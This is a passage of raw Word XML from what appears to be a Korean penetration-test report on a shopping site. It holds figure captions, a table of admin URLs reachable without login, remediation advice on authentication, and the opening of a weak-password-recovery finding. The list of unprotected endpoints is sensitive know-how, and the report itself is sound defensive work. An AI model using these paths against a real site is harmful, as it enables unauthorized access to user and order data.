        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003107A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인하지 않은 상태의 메인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="397"/>
    </w:p>
    <w:p w14:paraId="7237CFA1" w14:textId="77777777" w:rsidR="005D4622" w:rsidRPr="00CB22A6" w:rsidRDefault="005D4622" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62254933" w14:textId="58F4AC43" w:rsidR="005D4622" w:rsidRDefault="005D4622" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251559936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6024F352" wp14:editId="1DCCF88D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1978660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>285750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1630680" cy="220980"/>
                <wp:effectExtent l="0" t="0" r="26670" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474627" name="직사각형 1951474627"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="163068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A3615" id="직사각형 1951474627" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:155.8pt;margin-top:22.5pt;width:128.4pt;height:17.4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yIPuAIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdH9I0nbVTRW1CkKq&#10;2ooW9ex47exKXtvYzh+38g6VeAMuHHguVN6Bsb27jUrFAZGDM96Z+cbzzc/J6bYVaM2MbZQscXaQ&#10;YsQkVVUjlyX+eDt/c4SRdURWRCjJSrxjFp9OX7862eiC5apWomIGAYi0xUaXuHZOF0liac1aYg+U&#10;ZhKUXJmWOLiaZVIZsgH0ViR5mk6SjTKVNooya+HreVTiacDnnFF3xbllDokSw9tcOE04F/5Mpiek&#10;WBqi64Z2zyD/8IqWNBKCDlDnxBG0Ms0fUG1DjbKKuwOq2kRx3lAWcoBssvRZNjc10SzkAuRYPdBk&#10;/x8svVxfG9RUULvjcTY6HE3yQ4wkaaFWj9/uH798//nj/tfXB7SnBs422hbgeqOvTXezIHoCtty0&#10;/h9SQ9vA827gmW0dovAxm7xNJ0dQDgq6PE+PQQaY5MlbG+veMdUiL5TYQB0DvWR9YV007U18MKnm&#10;jRDwnRRCoo1PJh2nwcMq0VRe65XWLBdnwqA1gXaYz1P4dYH3zOAZQsJrfI4xqyC5nWAxwAfGgTHI&#10;I48RfK+yAZZQyqTLoqomFYvRxvvBeo+Qs5AA6JE5vHLA7gB6ywjSY0cGOnvvykKrD85d6n9zHjxC&#10;ZCXd4Nw2UpmXMhOQVRc52vckRWo8SwtV7aCfjIqDZjWdN1DBC2LdNTEwWVB02BbuCg4uFFRKdRJG&#10;tTKfX/ru7aHhQYvRBia1xPbTihiGkXgvYRSOs9HIj3a4jMaHOVzMvmaxr5Gr9kxB9TPYS5oG0ds7&#10;0YvcqPYOlsrMRwUVkRRil5g601/OXNwgsJYom82CGYyzJu5C3mjqwT2rvkNvt3fE6K6NHQzApeqn&#10;mhTPujnaek+pZiuneBNa/YnXjm9YBaFxurXld83+PVg9LdfpbwAAAP//AwBQSwMEFAAGAAgAAAAh&#10;ALRC68XfAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPhDAQhe8m/odmTLy5BdwFRIaNmhij&#10;8aCr3rt0FsjSKaFdwH9vPelxMl/e+165XUwvJhpdZxkhXkUgiGurO24QPj8er3IQzivWqrdMCN/k&#10;YFudn5Wq0Hbmd5p2vhEhhF2hEFrvh0JKV7dklFvZgTj8DnY0yodzbKQe1RzCTS+TKEqlUR2HhlYN&#10;9NBSfdydDMKbPR5k/5UkL9n9U5I9m3xuplfEy4vl7haEp8X/wfCrH9ShCk57e2LtRI9wHcdpQBHW&#10;m7ApAJs0X4PYI2Q3OciqlP8XVD8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAlOciD7gC&#10;AACkBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAtELr&#10;xd8AAAAJAQAADwAAAAAAAAAAAAAAAAASBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AB4GAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C9688D" w:rsidRPr="00C9688D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C9688D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AABCE85" wp14:editId="5B67FEAE">
            <wp:extent cx="4572000" cy="1897187"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="27305"/>
            <wp:docPr id="1951474634" name="그림 19514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1792" b="63773"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1897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61127" w14:textId="622CF45A" w:rsidR="005D4622" w:rsidRDefault="005D4622" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="398" w:name="_Toc20909461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38</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C9688D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>관리자 페이지의 회원 관리 페이지 접근 시도</w:t>
      </w:r>
      <w:bookmarkEnd w:id="398"/>
    </w:p>
    <w:p w14:paraId="315C843B" w14:textId="091BA37B" w:rsidR="00434B6C" w:rsidRDefault="00434B6C" w:rsidP="000C7F79">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45D8CF5D" w14:textId="4878510E" w:rsidR="00D76F80" w:rsidRDefault="00D76F80" w:rsidP="00434B6C">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00D76F80">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47A7A4AD" wp14:editId="3FA241A9">
            <wp:extent cx="4571752" cy="3021330"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="26670"/>
            <wp:docPr id="1951474635" name="그림 19514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252"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3021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A31D1" w14:textId="55D79E10" w:rsidR="005D4622" w:rsidRDefault="00D76F80" w:rsidP="00D76F80">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="399" w:name="_Toc20909461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39</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인증 없이 접근 가능</w:t>
      </w:r>
      <w:bookmarkEnd w:id="399"/>
    </w:p>
    <w:p w14:paraId="0BD5D8D9" w14:textId="77777777" w:rsidR="005D4622" w:rsidRDefault="005D4622" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25ECBFF8" w14:textId="77777777" w:rsidR="005D4622" w:rsidRPr="00CB22A6" w:rsidRDefault="005D4622" w:rsidP="005D4622">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5D4622" w:rsidRPr="00B112DB" w14:paraId="542FDC63" w14:textId="77777777" w:rsidTr="005E1156">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="068D5D59"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7842C10C"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33F4DF86"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0C7F79" w:rsidRPr="00B112DB" w14:paraId="4397C13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B26B175" w14:textId="6B12DAD4" w:rsidR="000C7F79" w:rsidRPr="00CB22A6" w:rsidRDefault="000C7F79" w:rsidP="000C7F79">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72BA22" w14:textId="3EF4B818" w:rsidR="000C7F79" w:rsidRPr="00CB22A6"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A5B8205" w14:textId="516524D4" w:rsidR="000C7F79" w:rsidRPr="00CB22A6"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member_admin.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C7F79" w:rsidRPr="00B112DB" w14:paraId="0FE1BE1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FDC8585" w14:textId="1FAFF7C0" w:rsidR="000C7F79" w:rsidRPr="00CB22A6" w:rsidRDefault="000C7F79" w:rsidP="000C7F79">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B02AD" w14:textId="36FEEB75"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DA28C00" w14:textId="3042B09C" w:rsidR="000C7F79" w:rsidRPr="00987A57"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/checkPing.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C7F79" w:rsidRPr="00B112DB" w14:paraId="7BE5C0F1"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E0A3324" w14:textId="3827EA7E" w:rsidR="000C7F79" w:rsidRPr="00CB22A6"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58CB9D" w14:textId="6E5BB0DF"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188104B" w14:textId="097E111D"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/order_admin_a.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C7F79" w:rsidRPr="00B112DB" w14:paraId="7E9DE287"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1575D43" w14:textId="0A085985"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A18251" w14:textId="7D5EFC2F"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211595B" w14:textId="4463411A"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/order_detail.do?order_no=16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C7F79" w:rsidRPr="00B112DB" w14:paraId="261E129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7DEB459" w14:textId="6ABBBFA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B99FB7" w14:textId="3FB58972"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D30D9BE" w14:textId="5A4F1D55"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/shop/goodsModifyForm.do?type=modify&amp;IDX=41</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C7F79" w:rsidRPr="00B112DB" w14:paraId="4819ADE3"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6D2CF5F" w14:textId="1C30B6E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6A5FD4" w14:textId="13E69DA8" w:rsidR="000C7F79" w:rsidRDefault="000C7F79" w:rsidP="000C7F79">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F3BDB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>메인</w:t>
            </w:r>
            <w:r w:rsidRPr="000F3BDB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 페이지 &gt;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BEB2C92" w14:textId="66C5336B" w:rsidR="000C7F79" w:rsidRPr="00181412" w:rsidRDefault="000C7F79" w:rsidP="000C7F79">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F3BDB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/shop/openGoodsWrite.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C7F79" w:rsidRPr="00B112DB" w14:paraId="6799779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DA28E29" w14:textId="058D9E2C"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7</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34C80F" w14:textId="24F9A7F2" w:rsidR="000C7F79" w:rsidRPr="000F3BDB"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3EBC961" w14:textId="3652868F" w:rsidR="000C7F79" w:rsidRPr="000F3BDB"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/as_admin.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C7F79" w:rsidRPr="00B112DB" w14:paraId="31055934"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050B622" w14:textId="353BEB1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8</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67E93A" w14:textId="56B7C5D3"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46B3CB9" w14:textId="1700EB00"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/goodsManage.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C7F79" w:rsidRPr="00B112DB" w14:paraId="228A8C4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AEEFD64" w14:textId="38346D6A"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9</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BA6BD" w14:textId="4E564B61"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BB89073" w14:textId="19442AAE" w:rsidR="000C7F79" w:rsidRPr="00181412"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adminCouponList.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C7F79" w:rsidRPr="00B112DB" w14:paraId="5507264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85391D8" w14:textId="0E549DE8"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10</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ED965" w14:textId="5F3A8986"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9B6CDEF" w14:textId="67261A38" w:rsidR="000C7F79" w:rsidRPr="00181412"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adminCouponWriteForm.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6245FCA0" w14:textId="77777777" w:rsidR="005D4622" w:rsidRDefault="005D4622" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F96D87" w14:textId="77777777" w:rsidR="005D4622" w:rsidRPr="00CB22A6" w:rsidRDefault="005D4622" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22531E0D" w14:textId="4AADD27B" w:rsidR="0029662C" w:rsidRDefault="005A3EB0" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="005A3EB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>관리자</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EB0">
        <w:t xml:space="preserve"> 페이지와 주요 기능에 접근하기 전 인증 절차를 거치도록 구현합니다. 이를 위해 다단계 인증(MFA)을 적용하고, 세션 및 토큰 기반의 인증 검증을 철저히 하며, 인증 우회가 발생하지 않도록 URL 직접 접근 차단, 접근 제어 정책 강화, 비인가 사용자에 대한 적절한 에러 처리 등을 수행해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09709A3E" w14:textId="77777777" w:rsidR="0029662C" w:rsidRDefault="0029662C">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F003662" w14:textId="7F225D6D" w:rsidR="00522F2B" w:rsidRDefault="00522F2B" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="400" w:name="_Toc209094562"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>취약한 패스워드 복구</w:t>
      </w:r>
      <w:bookmarkEnd w:id="400"/>
    </w:p>
    <w:p w14:paraId="2633384D" w14:textId="77777777" w:rsidR="00522F2B" w:rsidRDefault="00522F2B" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1603AEA1" w14:textId="7D74E10F" w:rsidR="00522F2B" w:rsidRPr="00B5070A" w:rsidRDefault="007E7018" w:rsidP="007E7018">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>비밀번호 찾기 혹은 재설정 기능에서 사용자에 대한 인증이 부족하거나 임시 비밀번호가 화면에 직접 노출</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>및 예측이 가능하게 발급하면 공격자가 타인에 대한 계정을 획득할 수 있는 취약점입니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이를 방지하기 위해 패스워드</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 복구 로직을 유추하기 어렵게 구현하고, 인증된 사용자 메일이나 SMS에서만 복구 패스워드를 확인할 수 있도록 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264F02FF" w14:textId="77777777" w:rsidR="00522F2B" w:rsidRDefault="00522F2B" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4032C66E" w14:textId="77777777" w:rsidR="00522F2B" w:rsidRPr="00CB22A6" w:rsidRDefault="00522F2B" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F342F9" w14:textId="39D0ED7F" w:rsidR="00522F2B" w:rsidRPr="00CB22A6" w:rsidRDefault="005B2D0C" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2D0C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>비밀번호</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2D0C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 재설정 및 아이디 찾기 페이지에 존재하는 취약한 패스워드 복구 로직으로 인해, 공격자가 다른 사용자의 패스워드를 불법적으로 획득하거나 변경할 수 있는 위험이 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5D4291" w14:textId="77777777" w:rsidR="00522F2B" w:rsidRDefault="00522F2B" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DCF951C" w14:textId="3FB58738" w:rsidR="00522F2B" w:rsidRPr="00CB22A6" w:rsidRDefault="00522F2B" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251565056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="030C53E5" wp14:editId="4EBDD22D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3608070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>728345</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="264795" cy="213360"/>
                <wp:effectExtent l="0" t="0" r="20955" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474636" name="직사각형 1951474636"/>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FD5D7" id="직사각형 1951474636" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:284.1pt;margin-top:57.35pt;width:20.85pt;height:16.8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fwuQIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdLNpktKomypqFYRU&#10;tRUt6tnx2tmVvB5jO9mEW3mHSrwBFw48FyrvwNj706hUHBA5OJ6dmW883/ycnG4rRTbCuhJ0RtOD&#10;ASVCc8hLvcrox9vFm7eUOM90zhRokdGdcPR09vrVSW2mYggFqFxYgiDaTWuT0cJ7M00SxwtRMXcA&#10;RmhUSrAV8yjaVZJbViN6pZLhYDBJarC5scCFc/j1vFHSWcSXUnB/JaUTnqiM4tt8PG08l+FMZids&#10;urLMFCVvn8H+4RUVKzUG7aHOmWdkbcs/oKqSW3Ag/QGHKgEpSy5iDphNOniWzU3BjIi5IDnO9DS5&#10;/wfLLzfXlpQ51u54nI6ORpPDCSWaVVirx2/3j1++//xx/+vrA9lTI2e1cVN0vTHXtpUcXgMBW2mr&#10;8I+pkW3kedfzLLaecPw4nIyOjseUcFQN08PDSaxD8uRsrPPvBFQkXDJqsYyRXba5cB4DomlnEmJp&#10;WJRKxVIqTeqQy2A8iB4OVJkHbbBzdrU8U5ZsGHbDYjHAX2gARNszQ0lp/BhSbJKKN79TImAo/UFI&#10;JCyk0UQIrSp6WMa50D5tVAXLRRNtvB+s84ihI2BAlvjKHrsF6CwbkA67eXNrH1xF7PTeuU39b869&#10;R4wM2vfOVanBvpSZwqzayI19R1JDTWBpCfkO28lCM2fO8EWJFbxgzl8zi4OFI4jLwl/hIRVgpaC9&#10;UVKA/fzS92CP/Y5aSmoc1Iy6T2tmBSXqvcZJOE5HozDZURiNj4Yo2H3Ncl+j19UZYPVTXEuGx2uw&#10;96q7SgvVHe6UeYiKKqY5xs4o97YTznyzQHArcTGfRzOcZsP8hb4xPIAHVkOH3m7vmDVtG3vs/0vo&#10;hppNn3VzYxs8NczXHmQZW/2J15Zv3ASxcdqtFVbNvhytnnbr7DcAAAD//wMAUEsDBBQABgAIAAAA&#10;IQAJVkDK4AAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsqFNTkjTEqQAJ&#10;IRALKO3ejadJVD+i2E3C3zOsYDlzj+6cKTezNWzEIXTeSVguEmDoaq8710jYfT3f5MBCVE4r4x1K&#10;+MYAm+ryolSF9pP7xHEbG0YlLhRKQhtjX3Ae6hatCgvfo6Ps6AerIo1Dw/WgJiq3hoskSblVnaML&#10;rerxqcX6tD1bCR/+dORmL8Rb9vgislebT834LuX11fxwDyziHP9g+NUndajI6eDPTgdmJNyluSCU&#10;guUqA0ZEmqzXwA60WeW3wKuS//+h+gEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQClOCfw&#10;uQIAAKMFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAJ&#10;VkDK4AAAAAsBAAAPAAAAAAAAAAAAAAAAABMFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADz&#10;AAAAIAYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FB31D35" wp14:editId="6334E3C2">
            <wp:extent cx="4572000" cy="1925664"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="17780"/>
            <wp:docPr id="1951474638" name="그림 19514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53" b="63177"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1925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982453" w14:textId="064C952D" w:rsidR="00522F2B" w:rsidRDefault="00522F2B" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="401" w:name="_Toc209094613"/>
      <w:r>
        <w:t xml:space="preserve">[그림] </w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText xml:space="preserve"> SEQ [</w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText>그림</w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText xml:space="preserve">] \* </w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText xml:space="preserve">ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인하지 않은 상태의 메인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="401"/>
    </w:p>
    <w:p w14:paraId="5AB62CC3" w14:textId="61941F44" w:rsidR="00522F2B" w:rsidRPr="00CB22A6" w:rsidRDefault="00522F2B" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E01FEA" w14:textId="32114969" w:rsidR="00522F2B" w:rsidRDefault="00661183" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
